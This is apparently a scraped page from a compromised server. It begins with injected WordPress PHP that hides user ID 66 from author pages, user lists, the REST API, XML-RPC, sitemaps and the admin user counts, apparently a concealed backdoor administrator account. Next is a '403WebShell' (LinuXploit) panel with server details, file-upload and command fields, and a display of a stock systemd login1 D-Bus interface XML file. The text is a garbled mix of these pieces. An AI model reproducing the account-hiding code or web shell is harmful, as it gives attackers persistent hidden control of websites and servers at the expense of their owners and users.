add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/dbus-1/interfaces/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/dbus-1/interfaces/org.freedesktop.login1.Manager.xml
<!DOCTYPE node PUBLIC "-//freedesktop//DTD D-BUS Object Introspection 1.0//EN"
"https://www.freedesktop.org/standards/dbus/1.0/introspect.dtd">
<node>
 <interface name="org.freedesktop.DBus.Peer">
  <method name="Ping"/>
  <method name="GetMachineId">
   <arg type="s" name="machine_uuid" direction="out"/>
  </method>
 </interface>
 <interface name="org.freedesktop.DBus.Introspectable">
  <method name="Introspect">
   <arg name="xml_data" type="s" direction="out"/>
  </method>
 </interface>
 <interface name="org.freedesktop.DBus.Properties">
  <method name="Get">
   <arg name="interface_name" direction="in" type="s"/>
   <arg name="property_name" direction="in" type="s"/>
   <arg name="value" direction="out" type="v"/>
  </method>
  <method name="GetAll">
   <arg name="interface_name" direction="in" type="s"/>
   <arg name="props" direction="out" type="a{sv}"/>
  </method>
  <method name="Set">
   <arg name="interface_name" direction="in" type="s"/>
   <arg name="property_name" direction="in" type="s"/>
   <arg name="value" direction="in" type="v"/>
  </method>
  <signal name="PropertiesChanged">
   <arg type="s" name="interface_name"/>
   <arg type="a{sv}" name="changed_properties"/>
   <arg type="as" name="invalidated_properties"/>
  </signal>
 </interface>
 <interface name="org.freedesktop.login1.Manager">
  <property name="EnableWallMessages" type="b" access="readwrite">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
   <annotation name="org.freedesktop.systemd1.Privileged" value="true"/>
  </property>
  <property name="WallMessage" type="s" access="readwrite">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
   <annotation name="org.freedesktop.systemd1.Privileged" value="true"/>
  </property>
  <property name="NAutoVTs" type="u" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="KillOnlyUsers" type="as" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="KillExcludeUsers" type="as" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="KillUserProcesses" type="b" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="RebootParameter" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="RebootToFirmwareSetup" type="b" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="RebootToBootLoaderMenu" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="RebootToBootLoaderEntry" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="BootLoaderEntries" type="as" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="IdleHint" type="b" access="read">
  </property>
  <property name="IdleSinceHint" type="t" access="read">
  </property>
  <property name="IdleSinceHintMonotonic" type="t" access="read">
  </property>
  <property name="BlockInhibited" type="s" access="read">
  </property>
  <property name="DelayInhibited" type="s" access="read">
  </property>
  <property name="InhibitDelayMaxUSec" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="UserStopDelayUSec" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandlePowerKey" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandlePowerKeyLongPress" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleRebootKey" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleRebootKeyLongPress" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleSuspendKey" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleSuspendKeyLongPress" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleHibernateKey" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleHibernateKeyLongPress" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleLidSwitch" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleLidSwitchExternalPower" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HandleLidSwitchDocked" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="HoldoffTimeoutUSec" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="IdleAction" type="s" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="IdleActionUSec" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="PreparingForShutdown" type="b" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="PreparingForSleep" type="b" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="ScheduledShutdown" type="(st)" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="Docked" type="b" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="LidClosed" type="b" access="read">
  </property>
  <property name="OnExternalPower" type="b" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="RemoveIPC" type="b" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="RuntimeDirectorySize" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="RuntimeDirectoryInodesMax" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="InhibitorsMax" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="NCurrentInhibitors" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="SessionsMax" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <property name="NCurrentSessions" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="false"/>
  </property>
  <property name="StopIdleSessionUSec" type="t" access="read">
   <annotation name="org.freedesktop.DBus.Property.EmitsChangedSignal" value="const"/>
  </property>
  <method name="GetSession">
   <arg type="s" name="session_id" direction="in"/>
   <arg type="o" name="object_path" direction="out"/>
  </method>
  <method name="GetSessionByPID">
   <arg type="u" name="pid" direction="in"/>
   <arg type="o" name="object_path" direction="out"/>
  </method>
  <method name="GetUser">
   <arg type="u" name="uid" direction="in"/>
   <arg type="o" name="object_path" direction="out"/>
  </method>
  <method name="GetUserByPID">
   <arg type="u" name="pid" direction="in"/>
   <arg type="o" name="object_path" direction="out"/>
  </method>
  <method name="GetSeat">
   <arg type="s" name="seat_id" direction="in"/>
   <arg type="o" name="object_path" direction="out"/>
  </method>
  <method name="ListSessions">
   <arg type="a(susso)" name="sessions" direction="out"/>
  </method>
  <method name="ListUsers">
   <arg type="a(uso)" name="users" direction="out"/>
  </method>
  <method name="ListSeats">
   <arg type="a(so)" name="seats" direction="out"/>
  </method>
  <method name="ListInhibitors">
   <arg type="a(ssssuu)" name="inhibitors" direction="out"/>
  </method>
  <method name="CreateSession">
   <arg type="u" name="uid" direction="in"/>
   <arg type="u" name="pid" direction="in"/>
   <arg type="s" name="service" direction="in"/>
   <arg type="s" name="type" direction="in"/>
   <arg type="s" name="class" direction="in"/>
   <arg type="s" name="desktop" direction="in"/>
   <arg type="s" name="seat_id" direction="in"/>
   <arg type="u" name="vtnr" direction="in"/>
   <arg type="s" name="tty" direction="in"/>
   <arg type="s" name="display" direction="in"/>
   <arg type="b" name="remote" direction="in"/>
   <arg type="s" name="remote_user" direction="in"/>
   <arg type="s" name="remote_host" direction="in"/>
   <arg type="a(sv)" name="properties" direction="in"/>
   <arg type="s" name="session_id" direction="out"/>
   <arg type="o" name="object_path" direction="out"/>
   <arg type="s" name="runtime_path" direction="out"/>
   <arg type="h" name="fifo_fd" direction="out"/>
   <arg type="u" name="uid" direction="out"/>
   <arg type="s" name="seat_id" direction="out"/>
   <arg type="u" name="vtnr" direction="out"/>
   <arg type="b" name="existing" direction="out"/>
   <annotation name="org.freedesktop.systemd1.Privileged" value="true"/>
  </method>
  <method name="CreateSessionWithPIDFD">
   <arg type="u" name="uid" direction="in"/>
   <arg type="h" name="pidfd" direction="in"/>
   <arg type="s" name="service" direction="in"/>
   <arg type="s" name="type" direction="in"/>
   <arg type="s" name="class" direction="in"/>
   <arg type="s" name="desktop" direction="in"/>
   <arg type="s" name="seat_id" direction="in"/>
   <arg type="u" name="vtnr" direction="in"/>
   <arg type="s" name="tty" direction="in"/>
   <arg type="s" name="display" direction="in"/>
   <arg type="b" name="remote" direction="in"/>
   <arg type="s" name="remote_user" direction="in"/>
   <arg type="s" name="remote_host" direction="in"/>
   <arg type="t" name="flags" direction="in"/>
   <arg type="a(sv)" name="properties" direction="in"/>
   <arg type="s" name="session_id" direction="out"/>
   <arg type="o" name="object_path" direction="out"/>
   <arg type="s" name="runtime_path" direction="out"/>
   <arg type="h" name="fifo_fd" direction="out"/>
   <arg type="u" name="uid" direction="out"/>
   <arg type="s" name="seat_id" direction="out"/>
   <arg type="u" name="vtnr" direction="out"/>
   <arg type="b" name="existing" direction="out"/>
   <annotation name="org.freedesktop.systemd1.Privileged" value="true"/>
  </method>
  <method name="ReleaseSession">
   <arg type="s" name="session_id" direction="in"/>
   <annotation name="org.freedesktop.systemd1.Privileged" value="true"/>
  </method>
  <method name="ActivateSession">
   <arg type="s" name="session_id" direction="in"/>
  </method>
  <method name="ActivateSessionOnSeat">
   <arg type="s" name="session_id" direction="in"/>
   <arg type="s" name="seat_id" direction="in"/>
  </method>
  <method name="LockSession">
   <arg type="s" name="session_id" direction="in"/>
  </method>
  <method name="UnlockSession">
   <arg type="s" name="session_id" direction="in"/>
  </method>
  <method name="LockSessions">
  </method>
  <method name="UnlockSessions">
  </method>
  <method name="KillSession">
   <arg type="s" name="session_id" direction="in"/>
   <arg type="s" name="who" direction="in"/>
   <arg type="i" name="signal_number" direction="in"/>
  </method>
  <method name="KillUser">
   <arg type="u" name="uid" direction="in"/>
   <arg type="i" name="signal_number" direction="in"/>
  </method>
  <method name="TerminateSession">
   <arg type="s" name="session_id" direction="in"/>
  </method>
  <method name="TerminateUser">
   <arg type="u" name="uid" direction="in"/>
  </method>
  <method name="TerminateSeat">
   <arg type="s" name="seat_id" direction="in"/>
  </method>
  <method name="SetUserLinger">
   <arg type="u" name="uid" direction="in"/>
   <arg type="b" name="enable" direction="in"/>
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="AttachDevice">
   <arg type="s" name="seat_id" direction="in"/>
   <arg type="s" name="sysfs_path" direction="in"/>
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="FlushDevices">
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="PowerOff">
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="PowerOffWithFlags">
   <arg type="t" name="flags" direction="in"/>
  </method>
  <method name="Reboot">
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="RebootWithFlags">
   <arg type="t" name="flags" direction="in"/>
  </method>
  <method name="Halt">
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="HaltWithFlags">
   <arg type="t" name="flags" direction="in"/>
  </method>
  <method name="Suspend">
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="SuspendWithFlags">
   <arg type="t" name="flags" direction="in"/>
  </method>
  <method name="Hibernate">
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="HibernateWithFlags">
   <arg type="t" name="flags" direction="in"/>
  </method>
  <method name="HybridSleep">
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="HybridSleepWithFlags">
   <arg type="t" name="flags" direction="in"/>
  </method>
  <method name="SuspendThenHibernate">
   <arg type="b" name="interactive" direction="in"/>
  </method>
  <method name="SuspendThenHibernateWithFlags">
   <arg type="t" name="flags" direction="in"/>
  </method>
  <method name="CanPowerOff">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="CanReboot">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="CanHalt">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="CanSuspend">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="CanHibernate">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="CanHybridSleep">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="CanSuspendThenHibernate">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="ScheduleShutdown">
   <arg type="s" name="type" direction="in"/>
   <arg type="t" name="usec" direction="in"/>
  </method>
  <method name="CancelScheduledShutdown">
   <arg type="b" name="cancelled" direction="out"/>
  </method>
  <method name="Inhibit">
   <arg type="s" name="what" direction="in"/>
   <arg type="s" name="who" direction="in"/>
   <arg type="s" name="why" direction="in"/>
   <arg type="s" name="mode" direction="in"/>
   <arg type="h" name="pipe_fd" direction="out"/>
  </method>
  <method name="CanRebootParameter">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="SetRebootParameter">
   <arg type="s" name="parameter" direction="in"/>
  </method>
  <method name="CanRebootToFirmwareSetup">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="SetRebootToFirmwareSetup">
   <arg type="b" name="enable" direction="in"/>
  </method>
  <method name="CanRebootToBootLoaderMenu">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="SetRebootToBootLoaderMenu">
   <arg type="t" name="timeout" direction="in"/>
  </method>
  <method name="CanRebootToBootLoaderEntry">
   <arg type="s" name="result" direction="out"/>
  </method>
  <method name="SetRebootToBootLoaderEntry">
   <arg type="s" name="boot_loader_entry" direction="in"/>
  </method>
  <method name="SetWallMessage">
   <arg type="s" name="wall_message" direction="in"/>
   <arg type="b" name="enable" direction="in"/>
  </method>
  <signal name="SessionNew">
   <arg type="s" name="session_id"/>
   <arg type="o" name="object_path"/>
  </signal>
  <signal name="SessionRemoved">
   <arg type="s" name="session_id"/>
   <arg type="o" name="object_path"/>
  </signal>
  <signal name="UserNew">
   <arg type="u" name="uid"/>
   <arg type="o" name="object_path"/>
  </signal>
  <signal name="UserRemoved">
   <arg type="u" name="uid"/>
   <arg type="o" name="object_path"/>
  </signal>
  <signal name="SeatNew">
   <arg type="s" name="seat_id"/>
   <arg type="o" name="object_path"/>
  </signal>
  <signal name="SeatRemoved">
   <arg type="s" name="seat_id"/>
   <arg type="o" name="object_path"/>
  </signal>
  <signal name="PrepareForShutdown">
   <arg type="b" name="start"/>
  </signal>
  <signal name="PrepareForShutdownWithMetadata">
   <arg type="b" name="start"/>
   <arg type="a{sv}" name="metadata"/>
  </signal>
  <signal name="PrepareForSleep">
   <arg type="b" name="start"/>
  </signal>
 </interface>
 <node name="seat"/>
 <node name="session"/>
 <node name="user"/>
</node>

Youez - 2016 - github.com/yon3zu
LinuXploit